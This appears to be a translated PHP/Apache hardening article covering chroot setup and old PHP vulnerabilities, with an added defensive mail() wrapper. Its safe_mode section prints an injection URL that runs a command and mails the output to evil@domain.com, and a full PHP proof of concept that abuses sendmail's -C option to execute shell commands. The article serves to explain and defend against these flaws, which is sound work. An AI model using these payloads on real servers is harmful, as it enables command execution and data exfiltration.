I. Web server security
PHP is only a module of the Web server, so the first thing to secure is the Web server itself. A secure Web server in turn requires a secure operating system, and so on; the chain has no end. PHP can be combined with many Web servers, but only Apache is discussed here. It is strongly recommended to start Apache in a chroot jail, so that even if Apache, PHP and its scripts are compromised, only the jailed environment is affected and the real system is not. Running Apache in a chroot does cause some inconvenience for applications, however: for example, connections to MySQL must go over TCP to 127.0.0.1 and cannot use the localhost Unix socket, which is slightly less efficient. Sending mail with the mail() function is also a problem, because these settings in php.ini:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
apply only to the Win32 platform, so a working sendmail has to be set up inside the chroot environment.
II. Problems in PHP itself
1. Remote overflow
All PHP versions up to 4.1.2 have a remote buffer overflow in the file upload handling; exploit programs for it are widely circulated and succeed at a very high rate.
2. Remote denial of service
PHP 4.2.0 and 4.2.1 have a remote vulnerability in the handling of multipart/form-data POST requests; although it does not give the attacker local user privileges, it can still cause a denial of service.
3. safe_mode bypass
PHP up to 4.2.2 has a vulnerability in which the mail() function bypasses the safe_mode restriction and executes commands. Starting with 4.0.5, mail() gained a fifth parameter, and the way it was designed allows the safe_mode restriction to be bypassed to execute commands. In 4.0.5 the bypass is very simple: the shell command is just appended after a semicolon. For example, given the PHP script evil.php:
execute the following URL:
http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com
This sends the output of id to evil@domain.com.
For PHP 4.0.6 through 4.2.2, bypassing safe_mode actually relies on sendmail's -C parameter (alternate configuration file), so the system must be using sendmail. The following code bypasses the safe_mode restriction and executes a command:
<?php
// Note: the following two files must not already exist, or else their owner
// must be the same user the script runs as:
$script = "/tmp/script123";
$cf     = "/tmp/cf123";
// Write a minimal sendmail configuration whose "local" mailer runs $script
// through /bin/sh.
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
// The script first removes itself and the config file, then runs $cmd
// ($cmd holds the command to execute; how it is set is not shown on the page).
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
// The fifth parameter is handed straight to sendmail; -C loads the config above.
mail("nobody", "", "", "", "-C$cf");
?>
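As an added defensive example (my own code, not part of the original article or of PHP itself), the wrapper below shows the safe way to use mail()'s fifth parameter: the application builds the single permitted option itself from a strictly validated address and never forwards caller-supplied text to sendmail. The function and parameter names (safe_mail, is_plain_address, $envelope_from) are my own.

```php
<?php
// Added defensive example: a mail() wrapper that never forwards caller-controlled
// text as sendmail options. The fifth argument of mail() reaches the local
// sendmail binary, so ';' (command separator) or options such as -C (alternate
// config file) in it must never originate from user input.

// Conservative address syntax: letters, digits and a few punctuation characters
// only, single recipient. Deliberately stricter than FILTER_VALIDATE_EMAIL, which
// accepts quoted local parts ("a b"@host) that can smuggle spaces or option-like text.
function is_plain_address(string $addr): bool
{
    return (bool) preg_match(
        '/^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$/',
        $addr
    );
}

// Returns false instead of calling mail() when any argument fails validation.
// $envelope_from is the only value ever turned into a sendmail option, and only
// as a fixed "-f<address>" built from a checked address.
function safe_mail(string $to, string $subject, string $body,
                   string $headers = '', ?string $envelope_from = null): bool
{
    if (!is_plain_address($to)) {
        return false;
    }
    // CR/LF in the subject, or a blank line inside the headers, would allow
    // header injection (extra recipients or an injected body).
    if (preg_match('/[\r\n]/', $subject) || preg_match('/\r?\n\r?\n/', $headers)) {
        return false;
    }
    $extra = '';
    if ($envelope_from !== null) {
        if (!is_plain_address($envelope_from)) {
            return false;
        }
        $extra = '-f' . $envelope_from;   // never accept raw flags from the caller
    }
    return mail($to, $subject, $body, $headers, $extra);
}

// Usage with constructed values. The first call succeeds only where a local MTA
// is configured; the second is refused before sendmail is ever started.
var_dump(safe_mail('user@example.com', 'Hello', 'Hi', '', 'noreply@example.com'));
var_dump(safe_mail('user@example.com', 'Hello', 'Hi', '', 'x@example.com -C/tmp/cf123'));
```

Current PHP releases run escapeshellcmd() over the fifth parameter, which neutralises ';' but does not prevent an attacker-chosen option such as -C from reaching sendmail, so building the option from validated data remains necessary.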
Users running any of the problematic versions above must upgrade to the latest version promptly in order to eliminate these basic security problems.